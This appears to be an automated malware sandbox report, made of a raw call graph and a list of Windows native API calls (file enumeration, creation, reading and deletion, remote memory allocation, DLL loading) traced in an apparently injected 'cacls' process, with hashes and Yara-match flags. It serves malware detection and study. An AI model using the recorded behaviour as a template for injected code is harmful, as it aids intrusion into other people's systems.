96443->96445 96444 67aa62 96444->96426 96445->96444 96446 6786c0 GetFileAttributesW 96445->96446 96447 67ad72 96445->96447 96450 67a470 RtlFreeHeap 96445->96450 96451 67a7e0 RtlFreeHeap 96445->96451 96446->96445 96448 67ad8b 96447->96448 96449 68b960 RtlFreeHeap 96447->96449 96448->96426 96449->96448 96450->96445 96451->96445 96453 6786e1 96452->96453 96454 6786f3 96453->96454 96455 6786e8 GetFileAttributesW 96453->96455 96454->96431 96456 6836f0 96454->96456 96455->96454 96457 6836fe 96456->96457 96458 683705 96456->96458 96457->96434 96459 674890 LdrLoadDll 96458->96459 96460 68373a 96459->96460 96461 683749 96460->96461 96484 6831b0 LdrLoadDll 96460->96484 96463 68ba40 RtlAllocateHeap 96461->96463 96467 6838f4 96461->96467 96464 683762 96463->96464 96465 6838ea 96464->96465 96464->96467 96468 68377e 96464->96468 96466 68b960 RtlFreeHeap 96465->96466 96465->96467 96466->96467 96467->96434 96468->96467 96469 68b960 RtlFreeHeap 96468->96469 96470 6838de 96469->96470 96470->96434 96472 67a496 96471->96472 96485 67deb0 96472->96485 96474 67a508 96475 67a526 96474->96475 96476 67a690 96474->96476 96477 67a675 96475->96477 96490 67a330 96475->96490 96476->96477 96478 67a330 RtlFreeHeap 96476->96478 96477->96434 96478->96476 96481 67a806 96480->96481 96482 67deb0 RtlFreeHeap 96481->96482 96483 67a88d 96482->96483 96483->96436 96484->96461 96487 67ded4 96485->96487 96486 67dee1 96486->96474 96487->96486 96488 68b960 RtlFreeHeap 96487->96488 96489 67df24 96488->96489 96489->96474 96491 67a34d 96490->96491 96494 67df40 96491->96494 96493 67a453 96493->96475 96495 67df64 96494->96495 96496 67e00e 96495->96496 96497 68b960 RtlFreeHeap 96495->96497 96496->96493 96497->96496 96498 688e50 96499 688e6a 96498->96499 96502 2f22d10 LdrInitializeThunk 96499->96502 96500 688e92 96502->96500 96503 686410 96504 68646a 96503->96504 96506 686477 96504->96506 96507 683e10 96504->96507 96508 68b8d0 NtAllocateVirtualMemory 96507->96508 96510 683e51 96508->96510 96509 683f5e 96509->96506 96510->96509 96511 674890 LdrLoadDll 96510->96511 96513 683e97 96511->96513 96512 683ee0 Sleep 96512->96513 96513->96509 96513->96512 96514 6896d0 96515 68977a 96514->96515 96517 6896fe 96514->96517 96516 689790 NtReadFile 96515->96516 96518 681b10 96519 681b2c 96518->96519 96520 681b68 96519->96520 96521 681b54 96519->96521 96522 689870 NtClose 96520->96522 96523 689870 NtClose 96521->96523 96524 681b71 96522->96524 96525 681b5d 96523->96525 96528 68ba80 RtlAllocateHeap 96524->96528 96527 681b7c 96528->96527 96529 6897d0 96530 6897fb 96529->96530 96531 689847 96529->96531 96532 68985d NtDeleteFile 96531->96532 96533 67715a 96534 67712c 96533->96534 96537 67715f 96533->96537 96538 678280 96534->96538 96536 677134 96539 67829d 96538->96539 96545 688f90 96539->96545 96541 6782ed 96542 6782f4 96541->96542 96543 689070 LdrInitializeThunk 96541->96543 96542->96536 96544 67831d 96543->96544 96544->96536 96546 68902e 96545->96546 96548 688fbe 96545->96548 96550 2f22e50 LdrInitializeThunk 96546->96550 96547 689067 96547->96541 96548->96541 96550->96547

                                                                                          Executed Functions

                                                                                          Function 0067C940 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 0067CA24
                                                                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 0067CA5F
                                                                                          • FindClose.KERNELBASE(?), ref: 0067CA6A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                          • String ID:
                                                                                          • API String ID: 3541575487-0
                                                                                          • Opcode ID: 9d27a8dcd305fc1bab0a29c7ea9d517702547bd46d60a9d6759da10dfb66ff6c
                                                                                          • Instruction ID: 9aa8277ded2f16fc38c6526d54c4c4404e74bb47ad8a14edb8d7c436f8f1c1a8
                                                                                          • Opcode Fuzzy Hash: 9d27a8dcd305fc1bab0a29c7ea9d517702547bd46d60a9d6759da10dfb66ff6c
                                                                                          • Instruction Fuzzy Hash: DF319271A00348ABDB60EBA4CC85FEF777D9F44755F14415CB609AB281EB70AB848BA4
                                                                                          Function 00689560 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • NtCreateFile.NTDLL(?,?,?,C3714B7A,?,?,?,?,?,?,?), ref: 00689661
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: e3c55a6a012d0c960e2372c45c7d93e030ed8fa0c9b77380962c01b5fbf43196
                                                                                          • Instruction ID: 667e1d414ec836473af55a374e15b2719d7800dc95bc1765501848241c497b88
                                                                                          • Opcode Fuzzy Hash: e3c55a6a012d0c960e2372c45c7d93e030ed8fa0c9b77380962c01b5fbf43196
                                                                                          • Instruction Fuzzy Hash: 9B31A0B5A01248AFDB54DF98D881EEFB7F9AF8C304F108219F919A7340D770A951CBA5
                                                                                          Function 006896D0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • NtReadFile.NTDLL(?,?,?,C3714B7A,?,?,?,?,?), ref: 006897B9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileRead
                                                                                          • String ID:
                                                                                          • API String ID: 2738559852-0
                                                                                          • Opcode ID: d26101aeaaa043df99420354c37e34887d72040b686b126e709cff6c41da8d29
                                                                                          • Instruction ID: b1149c018ad87f672a49537640c2bcd116de9df0ab7399024429c7132727bedd
                                                                                          • Opcode Fuzzy Hash: d26101aeaaa043df99420354c37e34887d72040b686b126e709cff6c41da8d29
                                                                                          • Instruction Fuzzy Hash: EA31C7B5A00208AFDB14DF99D881EEFB7F9EF88314F108219F919A7241D774A9118FA5
                                                                                          Function 006899D0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • NtAllocateVirtualMemory.NTDLL(0067209E,?,0068834F,C3714B7A,00000004,00003000,?,?,?,?,?,0068834F,0067209E,0068B901,0068834F,520F8B51), ref: 00689A98
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateMemoryVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 2167126740-0
                                                                                          • Opcode ID: ce89629044f2441d048d03dcdc22383d650bc2c2de4880009a5b8edf100d122a
                                                                                          • Instruction ID: 5d6e95dbe458a824639839c8a0c95ec38f845e3d5a3871828038c88a17336941
                                                                                          • Opcode Fuzzy Hash: ce89629044f2441d048d03dcdc22383d650bc2c2de4880009a5b8edf100d122a
                                                                                          • Instruction Fuzzy Hash: C7212BB5A00608AFDB14DF98DC81EEF77B9EF88710F108209FD19AB240D774A911CBA5
                                                                                          Function 006897D0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DeleteFile
                                                                                          • String ID:
                                                                                          • API String ID: 4033686569-0
                                                                                          • Opcode ID: 954619f73f159c906b658b08830aa2f3d9ebf4970ffdbfa5db3952952fb91dc1
                                                                                          • Instruction ID: e6543bd89eb09a5e9a3ff6b9036c6d1dd4b6712e2108feaf77a32f6f7018e6df
                                                                                          • Opcode Fuzzy Hash: 954619f73f159c906b658b08830aa2f3d9ebf4970ffdbfa5db3952952fb91dc1
                                                                                          • Instruction Fuzzy Hash: BA1191716002086FD620EAA4CC42FEB77ADDF85714F10820DFA09AB281DB757A158BE5
                                                                                          Function 00689870 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • NtClose.NTDLL(?,00673443,001F0001,?,00000000,?,?,00000104), ref: 006898A4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Close
                                                                                          • String ID:
                                                                                          • API String ID: 3535843008-0
                                                                                          • Opcode ID: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                                                          • Instruction ID: 1ef86899c3b2d87bc5a74a7be6d3be999c083db4bb564488e334b41f3bc97d44
                                                                                          • Opcode Fuzzy Hash: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                                                          • Instruction Fuzzy Hash: 08E086352102147BD120FB59DC41FDB779DEFC5750F004419FA08A7141CA717A4187F5
                                                                                          Function 02F22AC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 93182a2dc2601d3f7349125331b312e8c8849c595c44d8b2e7de76432379da6c
                                                                                          • Instruction ID: c9b127e516f089782753545761d43f33ae6d9bb3f1b6f211f55eeda42fee82fb
                                                                                          • Opcode Fuzzy Hash: 93182a2dc2601d3f7349125331b312e8c8849c595c44d8b2e7de76432379da6c
                                                                                          • Instruction Fuzzy Hash: AE90023160500802D55171584514B47000587D0381F51C415B1014654DC7698A5576A1
                                                                                          Function 02F22A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 1a4730e080e210a8dca90957dbde9ecda4e173b8eb9322b9b1a6b1882f3d1386
                                                                                          • Instruction ID: de0da6498ce1038e72fb8ab3f3eb32ad1c8a992792b27fb25e16871b166d0450
                                                                                          • Opcode Fuzzy Hash: 1a4730e080e210a8dca90957dbde9ecda4e173b8eb9322b9b1a6b1882f3d1386
                                                                                          • Instruction Fuzzy Hash: 7290026120200003450671584514A17400A87E0281B51C425F2004590DC53988917125
                                                                                          Function 02F22A10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: cb11c3019defe1d79a2b880cab6787280a5a1de8f7f21944ad4cfa9313895e27
                                                                                          • Instruction ID: 5c246cdb25d81d86fcf38028ad53f44a20be009c4775054fadfdcdb7c586d418
                                                                                          • Opcode Fuzzy Hash: cb11c3019defe1d79a2b880cab6787280a5a1de8f7f21944ad4cfa9313895e27
                                                                                          • Instruction Fuzzy Hash: 91900225221000020546A558070490B044597D63D1391C419F2406590CC63588656321
                                                                                          Function 02F22BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: b60d29e61bc49f219508b11ce72b7c7310ef10683b5719c367373171da70fd8d
                                                                                          • Instruction ID: 7a2b667edbc4278301f940fdff2adef94d3155132277af18aae8a469eb0888d8
                                                                                          • Opcode Fuzzy Hash: b60d29e61bc49f219508b11ce72b7c7310ef10683b5719c367373171da70fd8d
                                                                                          • Instruction Fuzzy Hash: 7E90023120100402D50165985508A47000587E0381F51D415B6014555EC67988917131
                                                                                          Function 02F22B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 8b4ba32d01dc1fa6647e30a54992ebfcd7ebdcf939b4feb8636810b2dd263d8a
                                                                                          • Instruction ID: 3d318bb2fcbc204e053fcaa39e9b7c733880344e436e40436f9f53d3bcb32742
                                                                                          • Opcode Fuzzy Hash: 8b4ba32d01dc1fa6647e30a54992ebfcd7ebdcf939b4feb8636810b2dd263d8a
                                                                                          • Instruction Fuzzy Hash: EB90023120108802D51161588504B4B000587D0381F55C815B5414658DC6A988917121
                                                                                          Function 02F22B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: ffe4f855f78d464f49392a6549a45ae06e0527458a57431db38278d940162bf9
                                                                                          • Instruction ID: d047429658b620ce910e5a4a7232eaebd2805b8e1d06834843c36601e09c4345
                                                                                          • Opcode Fuzzy Hash: ffe4f855f78d464f49392a6549a45ae06e0527458a57431db38278d940162bf9
                                                                                          • Instruction Fuzzy Hash: E390023120100842D50161584504F47000587E0381F51C41AB1114654DC629C8517521
                                                                                          Function 02F22B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: b2b0425965096aa1e9351ad7e7bf5107bb345553d1cad30bb3988b460983cfd5
                                                                                          • Instruction ID: 2cc137d025d1fc3908c9aa17a3bfc29af910d96b66856a1cd027a0de05964e04
                                                                                          • Opcode Fuzzy Hash: b2b0425965096aa1e9351ad7e7bf5107bb345553d1cad30bb3988b460983cfd5
                                                                                          • Instruction Fuzzy Hash: 0A90023120100802D58171584504A4B000587D1381F91C419B1015654DCA298A5977A1
                                                                                          Function 02F22B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 04a2817b25780769febd0919c6fe4c9ea5de066328433415c84dbbd343bcfbaa
                                                                                          • Instruction ID: e1be43d6070e14cee3fa12361c54b3d76c975a0b078f0dbc1149b85290ae11ad
                                                                                          • Opcode Fuzzy Hash: 04a2817b25780769febd0919c6fe4c9ea5de066328433415c84dbbd343bcfbaa
                                                                                          • Instruction Fuzzy Hash: EB90023120504842D54171584504E47001587D0385F51C415B1054694DD6398D55B661
                                                                                          Function 02F229F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 05fc8944941c975e4e6ba6fad2e69170d61feb38d6991a432e07bc9f2e870b72
                                                                                          • Instruction ID: a048fff3d9a3047178da8302290b64aef85860b2f0670c191a786dbdbb6178d2
                                                                                          • Opcode Fuzzy Hash: 05fc8944941c975e4e6ba6fad2e69170d61feb38d6991a432e07bc9f2e870b72
                                                                                          • Instruction Fuzzy Hash: 16900435311000030507F55C0704D070047C7D53D1351C435F3005550CD735CC717131
                                                                                          Function 02F22E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: ccff96329ee02101834cfabfd51d28227e3630755f395e7383979f099c87de31
                                                                                          • Instruction ID: 2b024db89d0f33d6409922fa4816c0fdf69b7d10f7c6f32592ec418431632f39
                                                                                          • Opcode Fuzzy Hash: ccff96329ee02101834cfabfd51d28227e3630755f395e7383979f099c87de31
                                                                                          • Instruction Fuzzy Hash: F090026134100442D50161584514F070005C7E1381F51C419F2054554DC62DCC527126
                                                                                          Function 02F22F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 1922e966983095e8e814f476ff67fc84479f818b98172a87bf6f12fe185c3be9
                                                                                          • Instruction ID: 53d2f5a1f1989356ea6492753c75dd852f71c0ae5f65bf4732179218504bfed3
                                                                                          • Opcode Fuzzy Hash: 1922e966983095e8e814f476ff67fc84479f818b98172a87bf6f12fe185c3be9
                                                                                          • Instruction Fuzzy Hash: 9090022121180042D60165684D14F07000587D0383F51C519B1144554CC92988616521
                                                                                          Function 02F22CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: ae37d5e2946494f4015fd913547aee8c6855bbeffc703cdd49b008443906d357
                                                                                          • Instruction ID: f1a09bdfb2d8b82b19a194081e465d2f34fd33239dccd72841dbcaf48f2e7792
                                                                                          • Opcode Fuzzy Hash: ae37d5e2946494f4015fd913547aee8c6855bbeffc703cdd49b008443906d357
                                                                                          • Instruction Fuzzy Hash: E6900221242041525946B1584504907400697E02C1791C416B2404950CC53A9856E621
                                                                                          Function 02F22C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 3992c62d2888999a26817e6ba8d07002dc728aeaf2b3b110b3d6b65217b79d69
                                                                                          • Instruction ID: 00fa2f5de95c6ea404a06863c79a90655c5921e49e0f17325f3fe116c735abed
                                                                                          • Opcode Fuzzy Hash: 3992c62d2888999a26817e6ba8d07002dc728aeaf2b3b110b3d6b65217b79d69
                                                                                          • Instruction Fuzzy Hash: 8F90022921300002D58171585508A0B000587D1282F91D819B1005558CC92988696321
                                                                                          Function 02F22D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: a3ac9d98ad8caebd285c324baa9aa49dbc1580cbefa757fb266d02c9e7e515c4
                                                                                          • Instruction ID: 2bf4b5d737f7b3c5e4e57e85c774289517f224a48257960b8eb0bdb46fe3c41a
                                                                                          • Opcode Fuzzy Hash: a3ac9d98ad8caebd285c324baa9aa49dbc1580cbefa757fb266d02c9e7e515c4
                                                                                          • Instruction Fuzzy Hash: B190023120100413D51261584604B07000987D02C1F91C816B1414558DD66A8952B121
                                                                                          Function 02F234E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: f98c16ecbcd5d1512b8db729621e528acc84cd3f55229d5735c72d3c0cf931d7
                                                                                          • Instruction ID: 63d88f1b617c34597a368daea5d0c3a1d12383aa530f37462c2ef9f2f951defa
                                                                                          • Opcode Fuzzy Hash: f98c16ecbcd5d1512b8db729621e528acc84cd3f55229d5735c72d3c0cf931d7
                                                                                          • Instruction Fuzzy Hash: E390023160510402D50161584614B07100587D0281F61C815B1414568DC7A9895175A2
                                                                                          Function 00683E10 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 108sleepCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
